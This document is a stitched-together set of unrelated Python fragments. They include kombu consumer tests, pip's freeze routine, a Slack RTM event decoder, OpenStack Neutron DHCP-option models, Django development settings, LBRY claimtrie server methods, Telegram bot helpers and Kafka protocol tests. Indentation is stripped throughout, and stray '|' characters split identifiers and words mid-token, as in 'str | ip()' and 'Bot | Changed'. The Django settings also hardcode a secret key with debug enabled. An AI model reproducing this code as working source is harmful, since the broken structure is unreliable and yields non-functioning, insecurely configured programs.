callback_called = [False]
def receive(payload, message):
callback_called[0] = True
c.backend.to_deliver.append("42")
self.assertEqual(c.fetch().payload, "42")
c.backend.to_deliver.append("46")
c.register_callback(receive)
self.assertEqual(c.fetch(enable_callbacks=True).payload, "46")
self.assertTrue(callback_called[0])
def test_discard_all_filterfunc_not_supported(self, n="xjf21j21"):
c = compat.Consumer(self.connection, queue=n, exchange=n,
routing_key="rkey")
self.assertRaises(NotImplementedError, c.discard_all,
filterfunc=lambda x: x)
c.close()
def test_wait(self, n="test_wait"):
class C(compat.Consumer):
def iterconsume(self, limit=None):
for i in range(limit):
yield i
c = C(self.connection, queue=n, exchange=n,
routing_key="rkey")
self.assertEqual(c.wait(10), range(10))
c.close()
def test_iterqueue(self, n="test_iterqueue"):
i = [0]
class C(compat.Consumer):
def fetch(self, limit=None):
z = i[0]
i[0] += 1
return z
c = C(self.connection, queue=n, exchange=n,
routing_key="rkey")
self.assertEqual(list(c.iterqueue(limit=10)), range(10))
c.close()
class test_ConsumerSet(unittest.TestCase):
def setUp(self):
self.connection = BrokerConnection(transport=Transport)
def test_constructor(self, prefix="0daf8h21"):
dcon = {"%s.xyx" % prefix: {"exchange": "%s.xyx" % prefix,
"routing_key": "xyx"},
"%s.xyz" % prefix: {"exchange": "%s.xyz" % prefix,
"routing_key": "xyz"}}
consumers = [compat.Consumer(self.connection, queue=prefix + str(i),
exchange=prefix + str(i))
for i in range(3)]
c = compat.ConsumerSet(self.connection, consumers=consumers)
c2 = compat.ConsumerSet(self.connection, from_dict=dcon)
self.assertEqual(len(c.queues), 3)
self.a |
# This Source Code Form is subject to the terms of the Mozilla Public
# Li | cense, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
WINDOWS_MSVC = {
"cmake": "3.7.2",
"llvm" | : "6.0.0",
"moztools": "0.0.1-5",
"ninja": "1.7.1",
"openssl": "1.1.0e-vs2015",
}
|
from __future__ import absolute_import
import logging
import re
import pip
from pip.req import InstallRequirement
from pip.req.req_file import COMMENT_RE
from pip.utils import get_installed_distributions
from pip._vendor import pkg_resources
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.pkg_resources import RequirementParseError
logger = logging.getLogger(__name__)
def freeze(
requirement=None,
find_links=None, local_only=None, user_only=None, skip_regex=None,
default_vcs=None,
isolated=False,
wheel_cache=None,
skip=()):
find_links = find_links or []
skip_match = None
if skip_regex:
skip_match = re.compile(skip_regex).search
dependency_links = []
for dist in pkg_resources.working_set:
if dist.has_metadata('dependency_links.txt'):
dependency_links.extend(
dist.get_metadata_lines('dependency_links.txt')
)
for link in find_links:
if '#egg=' in link:
dependency_links.append(link)
for link in find_links:
yield '-f %s' % link
installations = {}
for dist in get_installed_distributions(local_only=local_only,
skip=(),
user_only=user_only):
try:
req = pip.FrozenRequirement.from_dist(
dist,
dependency_links
)
except RequirementParseError:
logger.warning(
"Could not parse requirement: %s",
dist.project_name
)
continue
installations[req.name] = req
if requirement:
# the options that don't get turned into an InstallRequirement
# should only be emitted once, even if the same option is in multiple
# requirements files, so we need to keep track of what has been emitted
# so that we don't emit it again if it's seen again
emitted_options = set()
for req_file_path in requirement:
with open(req_file_path) as req_file:
for line in req_file:
if (not line.strip() or
line.strip().startswith('#') or
(skip_match and skip_match(line)) or
line.startswith((
'-r', '--requirement',
'-Z', '--always-unzip',
'-f', '--find-links',
'-i', '--index-url',
'--pre',
'--trusted-host',
'--process-dependency-links',
'--extra-index-url'))):
line = line.rstrip()
if line not in emitted_options:
emitted_options.add(line)
yield line
continue
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
line_req = InstallRequirement.from_editable(
line,
default_vcs=default_vcs,
isolated=isolated,
wheel_cache=wheel_cache,
)
else:
line_req = InstallRequirement.from_line(
COMMENT_RE.sub('', line).strip(),
isolated=isolated,
| wheel_cache=wheel_cache,
)
if not line_req.name:
logger.info(
"Skipping line in requirement file [%s] because "
"it's not clear what it would install: %s",
req_file_path, line.str | ip(),
)
logger.info(
" (add #egg=PackageName to the URL to avoid"
" this warning)"
)
elif line_req.name not in installations:
logger.warning(
"Requirement file [%s] contains %s, but that "
"package is not installed",
req_file_path, COMMENT_RE.sub('', line).strip(),
)
else:
yield str(installations[line_req.name]).rstrip()
del installations[line_req.name]
yield(
'## The following requirements were added by '
'pip freeze:'
)
for installation in sorted(
installations.values(), key=lambda x: x.name.lower()):
if canonicalize_name(installation.name) not in skip:
yield str(installation).rstrip()
|
"""
slackrealtime/event.py - Event handling for Slack RTM.
Copyright 2014-2020 Michael Farrell <http://micolous.id.au>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from datetime import datetime
from pytz import utc
class BaseEvent(object):
def __init__(self, body):
self._b = body
# Not all events have a timestamp.
if 'ts' in self._b:
# Time value is present in the message, parse it.
self.has_ts = True
self.ts = datetime.fromtimestamp(float(self._b['ts']), utc)
self.raw_ts = self._b['ts']
else:
# Time value is missing in the message, infer it based on receive time.
self.has_ts = False
self.ts = datetime.now(utc)
self.raw_ts = None
def __getattr__(self, attr):
attr = str(attr)
if attr in self._b:
return self._b[attr]
else:
raise AttributeError(attr)
def copy(self):
return decode_event(self._b)
def __str__(self):
return '<BaseEvent: @%r %r>' % (self.ts, self._b)
class Unknown(BaseEvent):
def __str__(self):
return '<Unknown: @%r %r>' % (self.ts, self._b)
class Hello(BaseEvent):
pass
class Message(BaseEvent):
def __getattr__(self, attr):
try:
return super(Message, self).__getattr__(attr)
except AttributeError:
if attr in ['user', 'username', 'subtype', 'attachments', 'thread_ts', 'text']:
# Bot message types are different
return None
# Raise other AttributeErrors
raise
def __str__(self):
subtype = self.subtype
if subtype is None:
subtype = ''
user = self.user
if user is None:
# Bot
user = self.username
else:
user = u'@' + user
attachments = ''
if self.attachments:
attachments = ' attachments=' + repr(self.attachments)
if len(attachments) > 40:
attachments = attachments[:37] + '...'
return '<Message(%s): %s: <%s> %s %s>' % (subtype, self.channel, user, self.text, attachments)
class BaseHistoryChanged(BaseEvent):
def __init__(self, body):
super(BaseHistoryChanged, self).__init__(body)
self.latest = datetime.fromtimestamp(float(self._b['latest']), utc)
self.event_ts = datetime.fromtimestamp(float(self._b['event_ts']), utc)
class BaseReactionEvent(BaseEvent):
def __init__(self, body):
super(BaseReactionEvent, self).__init__(body)
self.event_ts = datetime.fromtimestamp(float(self._b['event_ts']), utc)
class Ack(BaseEvent): pass
class ChannelArchive(BaseEvent): pass
class ChannelCreated(BaseEvent): pass
class ChannelDeleted(BaseEvent): pass
class ChannelHistoryChanged(BaseHistoryChanged): pass
class ChannelJoined(BaseEvent): pass
class ChannelLeft(BaseEvent): pass
class ChannelMarked(BaseEvent): pass
class ChannelRename(BaseEvent): pass
class ChannelUnarchive(BaseEvent): pass
class ImClose(BaseEvent): pass
class ImCreated(BaseEvent): pass
class ImHistoryChanged(BaseHistoryChanged): pass
class ImMarked(BaseEvent): pass
class ImOpen(BaseEvent): pass
class GroupJoined(BaseEvent): pass
class GroupLeft(BaseEvent): pass
class GroupOpen(BaseEvent): pass
class GroupClose(BaseEvent): pass
class GroupArchive(BaseEvent): pass
class GroupUnarchive(BaseEvent): pass
class GroupRename(BaseEvent): pass
class GroupMarked(BaseEvent): pass
class GroupHistoryChanged(BaseHistoryChanged): pass
class BotAdded(BaseEvent): pass
class Bot | Changed(BaseEvent): pass
class ReactionAdded(BaseReactionEvent): pass
class ReactionRemoved(BaseReactionEvent): pass
class PresenceChange(BaseEvent): pass
class UserChange(BaseEvent): pass
class UserTyping(BaseEvent): pass
class TeamPrefChang | e(BaseEvent): pass
class TeamJoin(BaseEvent): pass
EVENT_HANDLERS = {
u'hello': Hello,
u'message': Message,
u'channel_archive': ChannelArchive,
u'channel_created': ChannelCreated,
u'channel_deleted': ChannelDeleted,
u'channel_history_changed': ChannelHistoryChanged,
u'channel_joined': ChannelJoined,
u'channel_left': ChannelLeft,
u'channel_marked': ChannelMarked,
u'channel_rename': ChannelRename,
u'channel_unarchive': ChannelUnarchive,
u'im_close': ImClose,
u'im_created': ImCreated,
u'im_history_changed': ImHistoryChanged,
u'im_marked': ImMarked,
u'im_open': ImOpen,
u'group_joined': GroupJoined,
u'group_left': GroupLeft,
u'group_open': GroupOpen,
u'group_close': GroupClose,
u'group_archive': GroupArchive,
u'group_unarchive': GroupUnarchive,
u'group_rename': GroupRename,
u'group_marked': GroupMarked,
u'group_history_changed': GroupHistoryChanged,
u'bot_added': BotAdded,
u'bot_changed': BotChanged,
u'reaction_added': ReactionAdded,
u'reaction_removed': ReactionRemoved,
u'presence_change': PresenceChange,
u'user_change': UserChange,
u'user_typing': UserTyping,
u'team_pref_change': TeamPrefChange,
u'team_join': TeamJoin,
}
def decode_event(event):
event = event.copy()
if 'type' not in event:
# This is an acknowledgement of a previous command.
return Ack(event)
elif event['type'] in EVENT_HANDLERS:
t = event['type']
return EVENT_HANDLERS[t](event)
else:
return Unknown(event)
|
# Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.api.v2 import attributes
from neutron.db import db_base_plugin_v2
from neutron.db import model_base
from neutron.db import models_v2
from neutron.extensions import extra_dhcp_opt as edo_ext
class ExtraDhcpOpt(model_base.BASEV2, model_base.HasId):
"""Represent a generic concept of extra options associated to a port.
Each port may have none to many dhcp opts associated to it that can
define specifically different or extra options to DHCP clients.
These will be written to the <network_id>/opts files, and each option's
tag will be referenced in the <network_id>/host file.
"""
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
nullable=False)
opt_name = sa.Column(sa.String(64), nullable=False)
opt_value = sa.Column(sa.String(255), nullable=False)
ip_version = sa.Column(sa.Integer, server_default='4', nullable=False)
__table_args__ = (sa.UniqueConstraint(
'port_id',
'opt_name',
'ip_version',
name='uniq_extradhcpopts0portid0optname0ipversion'),
model_base.BASEV2.__table_args__,)
# Add a relationship to the Port model in order to instruct SQLAlchemy to
# eagerly load extra_dhcp_opts bindings
ports = orm.relationship(
models_v2.Port,
backref=orm.backref("dhcp_opts", lazy='joined', cascade='delete'))
class ExtraDhcpOptMixin(object):
"""Mixin class to add extra options to the DHCP opts file
and associate them to a port.
"""
def _is_valid_opt_value(self, opt_name, opt_value):
# If the dhcp opt is blank-able, it shouldn't be saved to the DB in
# case that the value is None
if opt_name in edo_ext.VALID_BLANK_EXTRA_DHCP_OPTS:
return opt_value is not None
# Otherwise, it shouldn't be saved to the DB in case that the value
# is None or empty
return bool(opt_value)
def _process_port_create_extra_dhcp_opts(self, context, port,
extra_dhcp_opts):
if not extra_dhcp_opts:
return port
with context.session.begin(subtransactions=True):
for dopt in extra_dhcp_opts:
if self._is_valid_opt_value(dopt['opt_name'],
dopt['opt_value']):
ip_version = dopt.get('ip_version', 4)
db = ExtraDhcpOpt(
port_id=port['id'],
opt_name=dopt['opt_name'],
opt_value=dopt['opt_value'],
ip_version=ip_version)
context.session.add(db)
return self._extend_port_extra_dhcp_opts_dict(context, port)
def _extend_port_extra_dhcp_opts_dict(self, context, port):
port[edo_ext.EXTRADHCPOPTS] = self._get_port_extra_dhcp_opts_binding(
context, port['id'])
def _get_port_extra_dhcp_opts_binding(self, context, port_id):
query = self._model_query(context, ExtraDhcpOpt)
binding = query.filter(ExtraDhcpOpt.port_id == port_id)
return [{'opt_name': r.opt_name, 'opt_value': r.opt_value,
'ip_version': r.ip_version}
for r in binding]
def _updat | e_extra_dhcp_opts_on_port(self, context, id, port,
updated_port=None):
# It is not necessary to update in a transaction, because
# its called from within one from | ovs_neutron_plugin.
dopts = port['port'].get(edo_ext.EXTRADHCPOPTS)
if dopts:
opt_db = self._model_query(
context, ExtraDhcpOpt).filter_by(port_id=id).all()
# if there are currently no dhcp_options associated to
# this port, Then just insert the new ones and be done.
with context.session.begin(subtransactions=True):
for upd_rec in dopts:
for opt in opt_db:
if (opt['opt_name'] == upd_rec['opt_name']
and opt['ip_version'] == upd_rec.get(
'ip_version', 4)):
# to handle deleting of a opt from the port.
if upd_rec['opt_value'] is None:
context.session.delete(opt)
else:
if (self._is_valid_opt_value(
opt['opt_name'],
upd_rec['opt_value']) and
opt['opt_value'] !=
upd_rec['opt_value']):
opt.update(
{'opt_value': upd_rec['opt_value']})
break
else:
if self._is_valid_opt_value(
upd_rec['opt_name'],
upd_rec['opt_value']):
ip_version = upd_rec.get('ip_version', 4)
db = ExtraDhcpOpt(
port_id=id,
opt_name=upd_rec['opt_name'],
opt_value=upd_rec['opt_value'],
ip_version=ip_version)
context.session.add(db)
if updated_port:
edolist = self._get_port_extra_dhcp_opts_binding(context, id)
updated_port[edo_ext.EXTRADHCPOPTS] = edolist
return bool(dopts)
def _extend_port_dict_extra_dhcp_opt(self, res, port):
res[edo_ext.EXTRADHCPOPTS] = [{'opt_name': dho.opt_name,
'opt_value': dho.opt_value,
'ip_version': dho.ip_version}
for dho in port.dhcp_opts]
return res
db_base_plugin_v2.NeutronDbPluginV2.register_dict_extend_funcs(
attributes.PORTS, ['_extend_port_dict_extra_dhcp_opt'])
|
# Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and Contributors and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, json
def execute(filters=None):
data = []
parents = {
"Sales BOM Item": "Sales BOM",
"BOM Explosion Item": "BOM",
"BOM Item": "BOM"
}
for doctype in ("Sales BOM Item",
"BOM Explosion Item" if filters.search_sub_assemblies else "BOM Item"):
all_boms = {}
for d in frappe.get_all(doctype, fields=["parent", "item_code"]):
all_boms.setdefault(d.parent, []).append(d.item_code)
for parent, items in all_boms.iteritems():
valid = True
for key, item in filters.iteritems():
if key != "search_sub_a | ssemblies":
if item and item not in items:
valid = False
if valid:
data.append((parent, parents[doctype]))
return [{
"fieldname": "parent",
"label": "BOM",
"width": 200,
"fieldtype": "Dynamic Link | ",
"options": "doctype"
},
{
"fieldname": "doctype",
"label": "Type",
"width": 200,
"fieldtype": "Data"
}], data
|
"""
T | emplate tags for reversion application.
" | ""
|
"""
Django settings for proxyme project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import tempfile
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '#z$gq7gm+w@6i44)!0n&c=om1x#6e^lj^=hf*e8r7^p*irrj-y'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED | _APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'proxy',
'clear_cache'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.Authenticat | ionMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'proxy.middleware.ProxyRequest',
'django.middleware.gzip.GZipMiddleware'
)
ROOT_URLCONF = 'proxyme.urls'
WSGI_APPLICATION = 'proxyme.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
CACHES = {
'default': {
'BACKEND': 'proxy.cache.backend.FileBasedCache',
'LOCATION': os.path.join(tempfile.gettempdir(), 'webcache'),
'TIMEOUT': 1800,
'OPTIONS': {
'MAX_ENTRIES': 10000
}
}
} |
n_info = await self.daemon.getrawtransaction(tx_hash, True)
if transaction_info and 'hex' in transaction_info and 'confirmations' in transaction_info:
# an unconfirmed transaction from lbrycrdd will not have a 'confirmations' field
return (self.db.db_height - transaction_info['confirmations']) + 1
elif transaction_info and 'hex' in transaction_info:
return -1
return None
async def claimtrie_getclaimssignedby(self, name):
winning_claim = await self.daemon.getvalueforname(name)
if winning_claim:
return await self.claimtrie_getclaimssignedbyid(winning_claim['claimId'])
async def claimtrie_getclaimssignedbyid(self, certificate_id):
claim_ids = self.get_claim_ids_signed_by(certificate_id)
return await self.batched_formatted_claims_from_daemon(claim_ids)
def claimtrie_getclaimssignedbyidminimal(self, certificate_id):
claim_ids = self.get_claim_ids_signed_by(certificate_id)
ret = []
for claim_id in claim_ids:
raw_claim_id = unhexlify(claim_id)[::-1]
info = self.db.get_claim_info(raw_claim_id)
if info:
ret.append({
'claim_id': claim_id,
'height': info.height,
'name': info.name.decode()
})
return ret
def get_claim_ids_signed_by(self, certificate_id):
raw_certificate_id = unhexlify(certificate_id)[::-1]
raw_claim_ids = self.db.get_signed_claim_ids_by_cert_id(raw_certificate_id)
return list(map(hash_to_hex_str, raw_claim_ids))
async def claimtrie_getclaimssignedbynthtoname(self, name, n):
claim = self.claimtrie_getnthclaimforname(name, n)
if claim and 'claim_id' in claim:
return await self.claimtrie_getclaimssignedbyid(hash_to_hex_str(claim['claim_id']))
async def claimtrie_getclaimsintx(self, txid):
# TODO: this needs further discussion.
# Code on lbryum-server is wrong and we need to gather what we clearly expect from this command
claim_ids = [claim['claimId'] for claim in (await self.daemon.getclaimsfortx(txid)) if 'claimId' in claim]
return await self.batched_formatted_claims_from_daemon(claim_ids)
async def claimtrie_getvalue(self, name, block_hash=None):
proof = await self.daemon.getnameproof(name, block_hash)
result = {'proof': proof, 'supports': []}
if proof_has_winning_claim(proof):
tx_hash, nout = proof['txhash'], int(proof['nOut'])
transaction_info = await self.daemon.getrawtransaction(tx_hash, True)
result['transaction'] = transaction_info['hex'] # should have never included this (or the call to get it)
raw_claim_id = self.db.get_claim_id_from_outpoint(unhexlify(tx_hash)[::-1], nout)
claim_id = hexlify(raw_claim_id[::-1]).decode()
claim = await self.claimtrie_getclaimbyid(claim_id)
result.update(claim)
return result
async def claimtrie_getnthclaimforname(self, name, n):
n = int(n)
result = await self.claimtrie_getclaimsforname(name)
if 'claims' in result and len(result['claims']) > n >= 0:
# TODO: revist this after lbrycrd_#209 to see if we can sort by claim_sequence at this point
result['claims'].sort(key=lambda c: (int(c['height']), int(c['nout'])))
result['claims'][n]['claim_sequence'] = n
| return result['claims'][n]
async def claimtrie_getpartialmatch(self, name, part):
result = await self.claimtrie_getclaimsforname(name)
if 'claims' in result:
return next(filter(lambda x: x['claim_id'].starts_with(part), result['claims']), None)
async def claimtrie_getclaimsforname(self, name):
claims = await self.daemon.getclaimsforname(name)
if claims:
claims['cl | aims'] = [self.format_claim_from_daemon(claim, name) for claim in claims['claims']]
claims['supports_without_claims'] = [] # fixme temporary
del claims['supports without claims']
claims['last_takeover_height'] = claims['nLastTakeoverHeight']
del claims['nLastTakeoverHeight']
return claims
return {}
async def batched_formatted_claims_from_daemon(self, claim_ids):
claims = await self.daemon.getclaimsbyids(claim_ids)
result = []
for claim in claims:
if claim and claim.get('value'):
result.append(self.format_claim_from_daemon(claim))
return result
def format_claim_from_daemon(self, claim, name=None):
"""Changes the returned claim data to the format expected by lbry and adds missing fields."""
if not claim:
return {}
# this ISO-8859 nonsense stems from a nasty form of encoding extended characters in lbrycrd
# it will be fixed after the lbrycrd upstream merge to v17 is done
# it originated as a fear of terminals not supporting unicode. alas, they all do
if 'name' in claim:
name = claim['name'].encode('ISO-8859-1').decode()
info = self.db.sql.get_claims(claim_id=claim['claimId'])
if not info:
# raise RPCError("Lbrycrd has {} but not lbryumx, please submit a bug report.".format(claim_id))
return {}
address = info.address.decode()
# fixme: temporary
#supports = self.format_supports_from_daemon(claim.get('supports', []))
supports = []
amount = get_from_possible_keys(claim, 'amount', 'nAmount')
height = get_from_possible_keys(claim, 'height', 'nHeight')
effective_amount = get_from_possible_keys(claim, 'effective amount', 'nEffectiveAmount')
valid_at_height = get_from_possible_keys(claim, 'valid at height', 'nValidAtHeight')
result = {
"name": name,
"claim_id": claim['claimId'],
"txid": claim['txid'],
"nout": claim['n'],
"amount": amount,
"depth": self.db.db_height - height + 1,
"height": height,
"value": hexlify(claim['value'].encode('ISO-8859-1')).decode(),
"address": address, # from index
"supports": supports,
"effective_amount": effective_amount,
"valid_at_height": valid_at_height
}
if 'claim_sequence' in claim:
# TODO: ensure that lbrycrd #209 fills in this value
result['claim_sequence'] = claim['claim_sequence']
else:
result['claim_sequence'] = -1
if 'normalized_name' in claim:
result['normalized_name'] = claim['normalized_name'].encode('ISO-8859-1').decode()
return result
def format_supports_from_daemon(self, supports):
return [[support['txid'], support['n'], get_from_possible_keys(support, 'amount', 'nAmount')] for
support in supports]
async def claimtrie_getclaimbyid(self, claim_id):
self.assert_claim_id(claim_id)
claim = await self.daemon.getclaimbyid(claim_id)
return self.format_claim_from_daemon(claim)
async def claimtrie_getclaimsbyids(self, *claim_ids):
claims = await self.batched_formatted_claims_from_daemon(claim_ids)
return dict(zip(claim_ids, claims))
def assert_tx_hash(self, value):
'''Raise an RPCError if the value is not a valid transaction
hash.'''
try:
if len(util.hex_to_bytes(value)) == 32:
return
except Exception:
pass
raise RPCError(1, f'{value} should be a transaction hash')
def assert_claim_id(self, value):
'''Raise an RPCError if the value is not a valid claim id
hash.'''
try:
if len(util.hex_to_bytes(value)) == 20:
return
except Exception:
pass
raise RPCError(1, f'{value} should be a claim id hash')
def normalize_name(self, name):
# this is designed to match lbrycrd; change it here if it changes there
return u |
import functools
import typing
import inspect
import itertools
import supycache
from telegram import Bot, User
@supycache.supycache(cache_key='admin_ids_{1}', max_age=10 * 60)
def get_admin_ids(bot: Bot, chat_id):
return [admin.user.id for admin in bot.get_chat_administrators(chat_id)]
def is_user_group_admin(bot: Bot, user_id, chat_id_, admin_id):
if chat_id_ == admin_id:
return False
return user_id in get_admin_ids(bot, chat_id_)
def get_username_or_name(user: User):
if user.username:
return user.username
if user.last_name:
return '%s %s' % (user.first_name, user.last_name)
return user.first_name
def parse_callback_data(data: str) -> typing.Tuple[str, str]:
module, data = data.split('/', maxsplit=1)
return module, data
def get_callback_data(data: str) -> str:
module, data = parse_callback_data(data)
return data
def set_callback_data(data: str) -> str:
"""
Хелпер, который добавляет в строку название модуля из которого выполняется.
Необходим, чтобы потом понимать каким хендлером обрабатывать CallbackQuery.
"""
module = inspect.currentframe().f_back.f_globals['__name__'].split('.')[-1]
return f'{module}/{data}'
def process_callback_query(func):
"""Позволяет выполнять CallbackQueryHandler только из того модуля, кото | рый находится в callback_data"""
current_module = inspect.currentframe().f_back.f_globals['__name__'].split('.')[-1]
@functools.wraps(func)
def inner(instance, bot, update):
module, data = parse_callback_data(update.callback_query.data)
if module == current_module:
return func(instance, bot, update)
return lambda: True # помечает update с CallbackQuery обработанным, | если ни один из хендлеров не подошел
return inner
def grouper(iterable, n):
"""
Позволяет разбивать итерабельный обьект по группам размера n
В отличии от рецепта grouper(iterable, n, fillvalue=None) документации
itertools (https://docs.python.org/3/library/itertools.html#itertools-recipes)
не заполняет недостяющее количество элементов в группе при помощи fillvalue
Возвращает генератор
Пример:
>>> my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> tuple(grouper(my_list, 3))
((1, 2, 3), (4, 5, 6), (7, 8, 9))
>>> tuple(grouper(my_list, 6))
((1, 2, 3, 4, 5, 6), (7, 8, 9))
"""
it = iter(iterable)
while True:
res = tuple(itertools.islice(it, n))
if res:
yield res
else:
break |
# Let's import the teq module. Make sure the dynamic linker is setup to find libteq.so. Also
# make sure that python finds teq.so (the python module).
#
import teq
# Let's import the little python library that makes some things a little easier
from pyteq import *
# Create a teq object. This creates the jack client, too..
t = teq.teq()
# Set the loop range. This is a function from pyteq that wraps creating the loop_range
# object and passing it to the teq instance.
set_loop_range(t, 0, 0, 1, 0, True)
# Create some tracks. Tracks have a name that MUST be unique. Otherwise track creation will
# fail with an exception.
print ("Adding a midi track...")
t.insert_midi_track("bd", 0)
print ("Adding a midi track...")
t.insert_midi_track("bar", 1)
print ("Adding a CV track...")
t.insert_cv_track("cv", 2)
print ("Adding a control track...")
t.insert_control_track("control", 3)
# Let's create a pattern. We can only create patterns using the factory function of
# the teq instance. It knows how many sequences the pattern has to have and their types.
#
# Note: you MUST NOT alter the tracks of the teq instance be | fore calling insert_pattern() or
# set_pattern() with the created pattern. Otherwise these operations will fail
# throwing an exception.
p = t.create_pattern(16)
print ("Inserting a CV event...")
p.set_cv_event(2, 0, teq.cv_event(teq.cv_event_type.INTERVAL, 1, 1))
print ("Inserting a control event...")
#p.set_control_event(3, 0, teq.control_event(teq.control_event_type.GLOBAL_TEMPO, 32))
for n in range(0, 16):
print ("Adding a midi note at tick ", n, " with no | te ", n, "...")
p.set_midi_event(0, n, teq.midi_event(teq.midi_event_type.ON, n, 64))
p.set_midi_event(1, n, teq.midi_event(teq.midi_event_type.CC, n, 64))
t.insert_pattern(0, p)
t.wait()
# Client processes MUST call gc() sometimes after altering state to clear up unused objects.
print ("Cleaning up some memory...")
t.gc()
t.set_global_tempo(4)
print ("Setting the transport position and starting playback...")
set_transport_position(t, 0, 0)
play(t)
# Wait for the user to press Enter...
try:
i = input("Press Enter to continue...")
except:
pass
t.deactivate()
|
# Value
struct.pack('>q', 0), # MsgSet Offset
struct.pack('>i', 18), # Msg Size
struct.pack('>i', -16383415), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k2', # Key
struct.pack('>i', 2), # Length of value
b'v2', # Value
])
expect = struct.pack('>i', len(expect)) + expect
assert encoded == expect
def test_decode_message_set():
encoded = b''.join([
struct.pack('>q', 0), # MsgSet Offset
struct.pack('>i', 18), # Msg Size
struct.pack('>i', 1474775406), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k1', # Key
struct.pack('>i', 2), # Length of value
b'v1', # Value
struct.pack('>q', 1), # MsgSet Offset
struct.pack('>i', 18), # Msg Size
struct.pack('>i', -16383415), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k2', # Key
struct.pack('>i', 2), # Length of value
b'v2', # Value
])
msgs = MessageSet.decode(encoded, bytes_to_read=len(encoded))
assert len(msgs) == 2
msg1, msg2 = msgs
returned_offset1, message1_size, decoded_message1 = msg1
returned_offset2, message2_size, decoded_message2 = msg2
assert returned_offset1 == 0
message1 = Message(b'v1', key=b'k1')
message1.encode()
assert decoded_message1 == message1
assert returned_offset2 == 1
message2 = Message(b'v2', key=b'k2')
message2.encode()
assert decoded_message2 == message2
def test_encode_message_header():
expect = b''.join([
struct.pack('>h', 10), # API Key
struct.pack('>h', 0), # API Version
struct.pack('>i', 4), # Correlation Id
struct.pack('>h', len('client3')), # Length of clientId
b'client3', # ClientId
])
req = GroupCoordinatorRequest[0]('foo')
header = RequestHeader(req, correlation_id=4, client_id='client3')
assert header.encode() == expect
def test_decode_message_set_partial():
encoded = b''.join([
struct.pack('>q', 0), # Msg Offset
struct.pack('>i', 18), # Msg Size
struct.pack('>i', 1474775406), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k1', # Key
struct.pack('>i', 2), # Length of value
b'v1', # Value
struct.pack('>q', 1), # Msg Offset
struct.pack('>i', 24), # Msg Size (larger than remaining MsgSet size)
struct.pack('>i', -16383415), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k2', # Key
struct.pack('>i', 8), # Length of value
b'ar', # Value (truncated)
])
msgs = MessageSet.decode(encoded, bytes_to_read=len(encoded))
assert len(msgs) == 2
msg1, msg2 = msgs
returned_offset1, message1_size, decoded_message1 = msg1
returned_offset2, message2_size, decoded_message2 = msg2
assert returned_offset1 == 0
message1 | = Message(b'v1', key=b'k1')
message1.encode()
assert decoded_message1 == message1
assert returned_offset2 is None
assert message2_size is None
assert decoded_message2 == PartialMessage()
def test_decode_fetch_response_partial():
encoded = b''.join([
Int32.encode(1), | # Num Topics (Array)
String('utf-8').encode('foobar'),
Int32.encode(2), # Num Partitions (Array)
Int32.encode(0), # Partition id
Int16.encode(0), # Error Code
Int64.encode(1234), # Highwater offset
Int32.encode(52), # MessageSet size
